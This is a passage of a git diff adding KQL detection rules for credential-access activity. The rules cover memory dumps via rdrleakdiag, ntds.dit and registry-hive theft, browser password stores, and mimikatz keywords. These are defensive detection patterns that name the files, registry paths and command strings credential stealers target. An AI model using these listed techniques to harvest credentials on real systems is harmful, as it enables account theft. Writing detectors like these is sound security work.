Access/process_memory_dump_via_rdrleakdiag_exe.kql b/KQL/rules/Credential Access/process_memory_dump_via_rdrleakdiag_exe.kql new file mode 100644 index 00000000..5ae8bf20 --- /dev/null +++ b/KQL/rules/Credential Access/process_memory_dump_via_rdrleakdiag_exe.kql @@ -0,0 +1,12 @@ +// Title: Process Memory Dump via RdrLeakDiag.EXE +// Author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-09-24 +// Level: high +// Description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "-memdmp" or ProcessCommandLine contains "/memdmp" or ProcessCommandLine contains "–memdmp" or ProcessCommandLine contains "—memdmp" or ProcessCommandLine contains "―memdmp" or ProcessCommandLine contains "fullmemdmp") and (ProcessCommandLine contains " -o " or ProcessCommandLine contains " /o " or ProcessCommandLine contains " –o " or ProcessCommandLine contains " —o " or ProcessCommandLine contains " ―o " or ProcessCommandLine contains " -p " or ProcessCommandLine contains " /p " or ProcessCommandLine contains " –p " or ProcessCommandLine contains " —p " or ProcessCommandLine contains " ―p ") and (FolderPath endswith "\\rdrleakdiag.exe" or ProcessVersionInfoOriginalFileName =~ "RdrLeakDiag.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/pua_dit_snapshot_viewer.kql b/KQL/rules/Credential Access/pua_dit_snapshot_viewer.kql new file mode 100644 index 00000000..04b58745 --- /dev/null +++ b/KQL/rules/Credential Access/pua_dit_snapshot_viewer.kql @@ -0,0 +1,12 @@ +// Title: PUA - DIT Snapshot Viewer +// Author: Furkan Caliskan (@caliskanfurkan_) +// Date: 2020-07-04 +// Level: high +// Description: Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.003 +// False Positives: +// - Legitimate admin usage + +DeviceProcessEvents +| where FolderPath endswith "\\ditsnap.exe" or ProcessCommandLine contains "ditsnap.exe" \ No newline at end of file diff --git a/KQL/rules/Credential Access/pua_mouse_lock_execution.kql b/KQL/rules/Credential Access/pua_mouse_lock_execution.kql new file mode 100644 index 00000000..a438a4e9 --- /dev/null +++ b/KQL/rules/Credential Access/pua_mouse_lock_execution.kql @@ -0,0 +1,12 @@ +// Title: PUA - Mouse Lock Execution +// Author: Cian Heasley +// Date: 2020-08-13 +// Level: medium +// Description: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.collection, attack.t1056.002 +// False Positives: +// - Legitimate uses of Mouse Lock software + +DeviceProcessEvents +| where ProcessVersionInfoProductName contains "Mouse Lock" or ProcessVersionInfoCompanyName contains "Misc314" or ProcessCommandLine contains "Mouse Lock_" \ No newline at end of file diff --git a/KQL/rules/Credential Access/pua_webbrowserpassview_execution.kql b/KQL/rules/Credential Access/pua_webbrowserpassview_execution.kql new file mode 100644 index 00000000..8dfa441e --- /dev/null +++ b/KQL/rules/Credential Access/pua_webbrowserpassview_execution.kql @@ -0,0 +1,12 @@ +// Title: PUA - WebBrowserPassView Execution +// Author: frack113 +// Date: 2022-08-20 +// Level: medium +// Description: Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555.003 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where ProcessVersionInfoFileDescription =~ "Web Browser Password Viewer" or FolderPath endswith "\\WebBrowserPassView.exe" \ No newline at end of file diff --git a/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql b/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql new file mode 100644 index 00000000..a14e467d --- /dev/null +++ b/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql @@ -0,0 +1,12 @@ +// Title: Registry Export of Third-Party Credentials +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-05-22 +// Level: high +// Description: Detects the use of reg.exe to export registry paths associated with third-party credentials. +Credential stealers have been known to use this technique to extract sensitive information from the registry. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.002 + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\Software\\Aerofox\\Foxmail\\V3.1" or ProcessCommandLine contains "\\Software\\Aerofox\\FoxmailPreview" or ProcessCommandLine contains "\\Software\\DownloadManager\\Passwords" or ProcessCommandLine contains "\\Software\\FTPWare\\COREFTP\\Sites" or ProcessCommandLine contains "\\Software\\IncrediMail\\Identities" or ProcessCommandLine contains "\\Software\\Martin Prikryl\\WinSCP 2\\Sessions" or ProcessCommandLine contains "\\Software\\Mobatek\\MobaXterm" or ProcessCommandLine contains "\\Software\\OpenSSH\\Agent\\Keys" or ProcessCommandLine contains "\\Software\\OpenVPN-GUI\\configs" or ProcessCommandLine contains "\\Software\\ORL\\WinVNC3\\Password" or ProcessCommandLine contains "\\Software\\Qualcomm\\Eudora\\CommandLine" or ProcessCommandLine contains "\\Software\\RealVNC\\WinVNC4" or ProcessCommandLine contains "\\Software\\RimArts\\B2\\Settings" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\Sessions" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\SshHostKeys" or ProcessCommandLine contains "\\Software\\Sota\\FFFTP" or ProcessCommandLine contains "\\Software\\TightVNC\\Server" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Radmin\\v3.0\\Server\\Parameters\\Radmin") and (ProcessCommandLine contains "save" or ProcessCommandLine contains "export") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/renamed_browsercore_exe_execution.kql b/KQL/rules/Credential Access/renamed_browsercore_exe_execution.kql new file mode 100644 index 00000000..ef376f0c --- /dev/null +++ b/KQL/rules/Credential Access/renamed_browsercore_exe_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed BrowserCore.EXE Execution +// Author: Max Altgelt (Nextron Systems) +// Date: 2022-06-02 +// Level: high +// Description: Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens) +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.defense-evasion, attack.t1528, attack.t1036.003 + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "BrowserCore.exe" and (not(FolderPath endswith "\\BrowserCore.exe")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql b/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql new file mode 100644 index 00000000..6938ed3d --- /dev/null +++ b/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql @@ -0,0 +1,14 @@ +// Title: Sensitive File Dump Via Wbadmin.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2024-05-10 +// Level: high +// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. +Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.003 +// False Positives: +// - Legitimate backup operation by authorized administrators. Matches must be investigated and allowed on a case by case basis. + +DeviceProcessEvents +| where (ProcessCommandLine contains "start" or ProcessCommandLine contains "backup") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE") and (ProcessCommandLine contains "\\config\\SAM" or ProcessCommandLine contains "\\config\\SECURITY" or ProcessCommandLine contains "\\config\\SYSTEM" or ProcessCommandLine contains "\\Windows\\NTDS\\NTDS.dit") \ No newline at end of file diff --git a/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql b/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql new file mode 100644 index 00000000..4a8e9c75 --- /dev/null +++ b/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql @@ -0,0 +1,12 @@ +// Title: Sensitive File Recovery From Backup Via Wbadmin.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2024-05-10 +// Level: high +// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. +Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.003 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "\\config\\SAM" or ProcessCommandLine contains "\\config\\SECURITY" or ProcessCommandLine contains "\\config\\SYSTEM" or ProcessCommandLine contains "\\Windows\\NTDS\\NTDS.dit") and (ProcessCommandLine contains " recovery" and ProcessCommandLine contains "recoveryTarget" and ProcessCommandLine contains "itemtype:File")) and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE") \ No newline at end of file diff --git a/KQL/rules/Credential Access/shadow_copies_creation_using_operating_systems_utilities.kql b/KQL/rules/Credential Access/shadow_copies_creation_using_operating_systems_utilities.kql new file mode 100644 index 00000000..8013e5e0 --- /dev/null +++ b/KQL/rules/Credential Access/shadow_copies_creation_using_operating_systems_utilities.kql @@ -0,0 +1,12 @@ +// Title: Shadow Copies Creation Using Operating Systems Utilities +// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community +// Date: 2019-10-22 +// Level: medium +// Description: Shadow Copies creation using operating systems utilities, possible credential access +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003, attack.t1003.002, attack.t1003.003 +// False Positives: +// - Legitimate administrator working with shadow copies, access for backup purposes + +DeviceProcessEvents +| where (ProcessCommandLine contains "shadow" and ProcessCommandLine contains "create") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/sqlite_chromium_profile_data_db_access.kql b/KQL/rules/Credential Access/sqlite_chromium_profile_data_db_access.kql new file mode 100644 index 00000000..77f36c3a --- /dev/null +++ b/KQL/rules/Credential Access/sqlite_chromium_profile_data_db_access.kql @@ -0,0 +1,10 @@ +// Title: SQLite Chromium Profile Data DB Access +// Author: TropChaud +// Date: 2022-12-19 +// Level: high +// Description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1539, attack.t1555.003, attack.collection, attack.t1005 + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\User Data\\" or ProcessCommandLine contains "\\Opera Software\\" or ProcessCommandLine contains "\\ChromiumViewer\\") and (ProcessCommandLine contains "Login Data" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Web Data" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/sqlite_firefox_profile_data_db_access.kql b/KQL/rules/Credential Access/sqlite_firefox_profile_data_db_access.kql new file mode 100644 index 00000000..0bbedf19 --- /dev/null +++ b/KQL/rules/Credential Access/sqlite_firefox_profile_data_db_access.kql @@ -0,0 +1,10 @@ +// Title: SQLite Firefox Profile Data DB Access +// Author: frack113 +// Date: 2022-04-08 +// Level: high +// Description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1539, attack.collection, attack.t1005 + +DeviceProcessEvents +| where (ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "places.sqlite") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql b/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql new file mode 100644 index 00000000..1a903487 --- /dev/null +++ b/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql @@ -0,0 +1,17 @@ +// Title: Suspicious File Access to Browser Credential Storage +// Author: frack113, X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems), Parth-FourCore +// Date: 2025-05-22 +// Level: low +// Description: Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts. +Adversaries may attempt to access browser credential storage to extract sensitive information such as usernames and passwords or cookies. +This behavior is often commonly observed in credential stealing malware. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555.003, attack.discovery, attack.t1217 +// False Positives: +// - Antivirus, Anti-Spyware, Anti-Malware Software +// - Legitimate software accessing browser data for synchronization or backup purposes. +// - Legitimate software installed on partitions other than "C:\" + +DeviceFileEvents +| where ((FileName contains "\\Sputnik\\Sputnik" or FileName contains "\\MapleStudio\\ChromePlus" or FileName contains "\\QIP Surf" or FileName contains "\\BlackHawk" or FileName contains "\\7Star\\7Star" or FileName contains "\\CatalinaGroup\\Citrio" or FileName contains "\\Google\\Chrome" or FileName contains "\\Coowon\\Coowon" or FileName contains "\\CocCoc\\Browser" or FileName contains "\\uCozMedia\\Uran" or FileName contains "\\Tencent\\QQBrowser" or FileName contains "\\Orbitum" or FileName contains "\\Slimjet" or FileName contains "\\Iridium" or FileName contains "\\Vivaldi" or FileName contains "\\Chromium" or FileName contains "\\GhostBrowser" or FileName contains "\\CentBrowser" or FileName contains "\\Xvast" or FileName contains "\\Chedot" or FileName contains "\\SuperBird" or FileName contains "\\360Browser\\Browser" or FileName contains "\\360Chrome\\Chrome" or FileName contains "\\Comodo\\Dragon" or FileName contains "\\BraveSoftware\\Brave-Browser" or FileName contains "\\Torch" or FileName contains "\\UCBrowser\\" or FileName contains "\\Blisk" or FileName contains "\\Epic Privacy Browser" or FileName contains "\\Nichrome" or FileName contains "\\Amigo" or FileName contains "\\Kometa" or FileName contains "\\Xpom" or FileName contains "\\Microsoft\\Edge" or FileName contains "\\Liebao7Default\\EncryptedStorage" or FileName contains "\\AVAST Software\\Browser" or FileName contains "\\Kinza" or FileName contains "\\Mozilla\\SeaMonkey\\" or FileName contains "\\Comodo\\IceDragon\\" or FileName contains "\\8pecxstudios\\Cyberfox\\" or FileName contains "\\FlashPeak\\SlimBrowser\\" or FileName contains "\\Moonchild Productions\\Pale Moon\\") and (FileName contains "\\Profiles\\" or FileName contains "\\User Data") and ((FileName contains "\\Login Data" or FileName contains "\\Cookies" or FileName contains "\\EncryptedStorage" or FileName contains "\\WebCache\\") or (FileName endswith "cert9.db" or FileName endswith "cookies.sqlite" or FileName endswith "formhistory.sqlite" or FileName endswith "key3.db" or FileName endswith "key4.db" or FileName endswith "Login Data.sqlite" or FileName endswith "logins.json" or FileName endswith "places.sqlite"))) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or (InitiatingProcessFolderPath endswith "\\Sputnik.exe" or InitiatingProcessFolderPath endswith "\\ChromePlus.exe" or InitiatingProcessFolderPath endswith "\\QIP Surf.exe" or InitiatingProcessFolderPath endswith "\\BlackHawk.exe" or InitiatingProcessFolderPath endswith "\\7Star.exe" or InitiatingProcessFolderPath endswith "\\Sleipnir5.exe" or InitiatingProcessFolderPath endswith "\\Citrio.exe" or InitiatingProcessFolderPath endswith "\\Chrome SxS.exe" or InitiatingProcessFolderPath endswith "\\Chrome.exe" or InitiatingProcessFolderPath endswith "\\Coowon.exe" or InitiatingProcessFolderPath endswith "\\CocCocBrowser.exe" or InitiatingProcessFolderPath endswith "\\Uran.exe" or InitiatingProcessFolderPath endswith "\\QQBrowser.exe" or InitiatingProcessFolderPath endswith "\\Orbitum.exe" or InitiatingProcessFolderPath endswith "\\Slimjet.exe" or InitiatingProcessFolderPath endswith "\\Iridium.exe" or InitiatingProcessFolderPath endswith "\\Vivaldi.exe" or InitiatingProcessFolderPath endswith "\\Chromium.exe" or InitiatingProcessFolderPath endswith "\\GhostBrowser.exe" or InitiatingProcessFolderPath endswith "\\CentBrowser.exe" or InitiatingProcessFolderPath endswith "\\Xvast.exe" or InitiatingProcessFolderPath endswith "\\Chedot.exe" or InitiatingProcessFolderPath endswith "\\SuperBird.exe" or InitiatingProcessFolderPath endswith "\\360Browser.exe" or InitiatingProcessFolderPath endswith "\\360Chrome.exe" or InitiatingProcessFolderPath endswith "\\dragon.exe" or InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\torch.exe" or InitiatingProcessFolderPath endswith "\\UCBrowser.exe" or InitiatingProcessFolderPath endswith "\\BliskBrowser.exe" or InitiatingProcessFolderPath endswith "\\Epic Privacy Browser.exe" or InitiatingProcessFolderPath endswith "\\nichrome.exe" or InitiatingProcessFolderPath endswith "\\AmigoBrowser.exe" or InitiatingProcessFolderPath endswith "\\KometaBrowser.exe" or InitiatingProcessFolderPath endswith "\\XpomBrowser.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\LiebaoBrowser.exe" or InitiatingProcessFolderPath endswith "\\AvastBrowser.exe" or InitiatingProcessFolderPath endswith "\\Kinza.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\icedragon.exe" or InitiatingProcessFolderPath endswith "\\cyberfox.exe" or InitiatingProcessFolderPath endswith "\\SlimBrowser.exe" or InitiatingProcessFolderPath endswith "\\palemoon.exe") or (InitiatingProcessFolderPath contains "\\Sputnik\\" or InitiatingProcessFolderPath contains "\\MapleStudio\\" or InitiatingProcessFolderPath contains "\\QIP Surf\\" or InitiatingProcessFolderPath contains "\\BlackHawk\\" or InitiatingProcessFolderPath contains "\\7Star\\" or InitiatingProcessFolderPath contains "\\Fenrir Inc\\" or InitiatingProcessFolderPath contains "\\CatalinaGroup\\" or InitiatingProcessFolderPath contains "\\Google\\" or InitiatingProcessFolderPath contains "\\Coowon\\" or InitiatingProcessFolderPath contains "\\CocCoc\\" or InitiatingProcessFolderPath contains "\\uCozMedia\\" or InitiatingProcessFolderPath contains "\\Tencent\\" or InitiatingProcessFolderPath contains "\\Orbitum\\" or InitiatingProcessFolderPath contains "\\Slimjet\\" or InitiatingProcessFolderPath contains "\\Iridium\\" or InitiatingProcessFolderPath contains "\\Vivaldi\\" or InitiatingProcessFolderPath contains "\\Chromium\\" or InitiatingProcessFolderPath contains "\\GhostBrowser\\" or InitiatingProcessFolderPath contains "\\CentBrowser\\" or InitiatingProcessFolderPath contains "\\Xvast\\" or InitiatingProcessFolderPath contains "\\Chedot\\" or InitiatingProcessFolderPath contains "\\SuperBird\\" or InitiatingProcessFolderPath contains "\\360Browser\\" or InitiatingProcessFolderPath contains "\\360Chrome\\" or InitiatingProcessFolderPath contains "\\Comodo\\" or InitiatingProcessFolderPath contains "\\BraveSoftware\\" or InitiatingProcessFolderPath contains "\\Torch\\" or InitiatingProcessFolderPath contains "\\UCBrowser\\" or InitiatingProcessFolderPath contains "\\Blisk\\" or InitiatingProcessFolderPath contains "\\Epic Privacy Browser\\" or InitiatingProcessFolderPath contains "\\Nichrome\\" or InitiatingProcessFolderPath contains "\\Amigo\\" or InitiatingProcessFolderPath contains "\\Kometa\\" or InitiatingProcessFolderPath contains "\\Xpom\\" or InitiatingProcessFolderPath contains "\\Microsoft\\" or InitiatingProcessFolderPath contains "\\Liebao7\\" or InitiatingProcessFolderPath contains "\\AVAST Software\\" or InitiatingProcessFolderPath contains "\\Kinza\\" or InitiatingProcessFolderPath contains "\\Mozilla\\" or InitiatingProcessFolderPath contains "\\8pecxstudios\\" or InitiatingProcessFolderPath contains "\\FlashPeak\\" or InitiatingProcessFolderPath contains "\\Moonchild Productions\\") or (InitiatingProcessFolderPath =~ "System" and InitiatingProcessParentFileName =~ "Idle")))) and (not(((InitiatingProcessFolderPath contains "\\Microsoft\\Windows Defender\\" and (InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe")) or InitiatingProcessParentFileName =~ "msiexec.exe" or InitiatingProcessFolderPath endswith "\\everything.exe" or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe")))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/suspicious_history_file_operations.kql b/KQL/rules/Credential Access/suspicious_history_file_operations.kql new file mode 100644 index 00000000..73d5d226 --- /dev/null +++ b/KQL/rules/Credential Access/suspicious_history_file_operations.kql @@ -0,0 +1,13 @@ +// Title: Suspicious History File Operations +// Author: Mikhail Larin, oscd.community +// Date: 2020-10-17 +// Level: medium +// Description: Detects commandline operations on shell history files +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.003 +// False Positives: +// - Legitimate administrative activity +// - Legitimate software, cleaning hist file + +DeviceProcessEvents +| where ProcessCommandLine contains ".bash_history" or ProcessCommandLine contains ".zsh_history" or ProcessCommandLine contains ".zhistory" or ProcessCommandLine contains ".history" or ProcessCommandLine contains ".sh_history" or ProcessCommandLine contains "fish_history" \ No newline at end of file diff --git a/KQL/rules/Credential Access/suspicious_key_manager_access.kql b/KQL/rules/Credential Access/suspicious_key_manager_access.kql new file mode 100644 index 00000000..7d436e24 --- /dev/null +++ b/KQL/rules/Credential Access/suspicious_key_manager_access.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Key Manager Access +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-21 +// Level: high +// Description: Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager) +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555.004 +// False Positives: +// - Administrative activity + +DeviceProcessEvents +| where (ProcessCommandLine contains "keymgr" and ProcessCommandLine contains "KRShowKeyMgr") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/KQL/rules/Credential Access/suspicious_process_patterns_ntds_dit_exfil.kql b/KQL/rules/Credential Access/suspicious_process_patterns_ntds_dit_exfil.kql new file mode 100644 index 00000000..565ac3f8 --- /dev/null +++ b/KQL/rules/Credential Access/suspicious_process_patterns_ntds_dit_exfil.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Process Patterns NTDS.DIT Exfil +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-11 +// Level: high +// Description: Detects suspicious process patterns used in NTDS.DIT exfiltration +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.003 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "ac i ntds" and ProcessCommandLine contains "create full") or (ProcessCommandLine contains "/c copy " and ProcessCommandLine contains "\\windows\\ntds\\ntds.dit") or (ProcessCommandLine contains "activate instance ntds" and ProcessCommandLine contains "create full") or (ProcessCommandLine contains "powershell" and ProcessCommandLine contains "ntds.dit") or ((FolderPath endswith "\\NTDSDump.exe" or FolderPath endswith "\\NTDSDumpEx.exe") or (ProcessCommandLine contains "ntds.dit" and ProcessCommandLine contains "system.hiv") or ProcessCommandLine contains "NTDSgrab.ps1")) or (((InitiatingProcessFolderPath contains "\\apache" or InitiatingProcessFolderPath contains "\\tomcat" or InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "\\Temp\\" or InitiatingProcessFolderPath contains "\\Public\\" or InitiatingProcessFolderPath contains "\\PerfLogs\\") or (FolderPath contains "\\apache" or FolderPath contains "\\tomcat" or FolderPath contains "\\AppData\\" or FolderPath contains "\\Temp\\" or FolderPath contains "\\Public\\" or FolderPath contains "\\PerfLogs\\")) and ProcessCommandLine contains "ntds.dit") \ No newline at end of file diff --git a/KQL/rules/Credential Access/suspicious_reg_add_open_command.kql b/KQL/rules/Credential Access/suspicious_reg_add_open_command.kql new file mode 100644 index 00000000..b4a69993 --- /dev/null +++ b/KQL/rules/Credential Access/suspicious_reg_add_open_command.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Reg Add Open Command +// Author: frack113 +// Date: 2021-12-20 +// Level: medium +// Description: Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003 + +DeviceProcessEvents +| where (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings\\shell\\open\\command" and ProcessCommandLine contains "/ve " and ProcessCommandLine contains "/d") or (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings\\shell\\open\\command" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "DelegateExecute") or (ProcessCommandLine contains "reg" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings") \ No newline at end of file diff --git a/KQL/rules/Credential Access/suspicious_serv_u_process_pattern.kql b/KQL/rules/Credential Access/suspicious_serv_u_process_pattern.kql new file mode 100644 index 00000000..f7bbaceb --- /dev/null +++ b/KQL/rules/Credential Access/suspicious_serv_u_process_pattern.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Serv-U Process Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2021-07-14 +// Level: high +// Description: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555, cve.2021-35211 +// False Positives: +// - Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution + +DeviceProcessEvents +| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe") and InitiatingProcessFolderPath endswith "\\Serv-U.exe" \ No newline at end of file diff --git a/KQL/rules/Credential Access/suspicious_system_user_process_creation.kql b/KQL/rules/Credential Access/suspicious_system_user_process_creation.kql new file mode 100644 index 00000000..f532a1dd --- /dev/null +++ b/KQL/rules/Credential Access/suspicious_system_user_process_creation.kql @@ -0,0 +1,14 @@ +// Title: Suspicious SYSTEM User Process Creation +// Author: Florian Roth (Nextron Systems), David ANDRE (additional keywords) +// Date: 2021-12-20 +// Level: high +// Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter) +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.defense-evasion, attack.privilege-escalation, attack.t1134, attack.t1003, attack.t1027 +// False Positives: +// - Administrative activity +// - Scripts and administrative tools used in the monitored environment +// - Monitoring activity + +DeviceProcessEvents +| where (((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\wscript.exe") or ProcessCommandLine matches regex "net\\s+user\\s+" or (ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " -decode " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /urlcache " or ProcessCommandLine contains " -urlcache " or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " JAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SUVYI") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SQBFAFgA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aWV4I") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " IAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aQBlAHgA") or ProcessCommandLine contains "vssadmin delete shadows" or ProcessCommandLine contains "reg SAVE HKLM" or ProcessCommandLine contains " -ma " or ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "event::clear" or ProcessCommandLine contains "event::drop" or ProcessCommandLine contains "id::modify" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "misc::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "sid::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "vault::cred" or ProcessCommandLine contains "vault::list" or ProcessCommandLine contains " p::d " or ProcessCommandLine contains ";iex(" or ProcessCommandLine contains 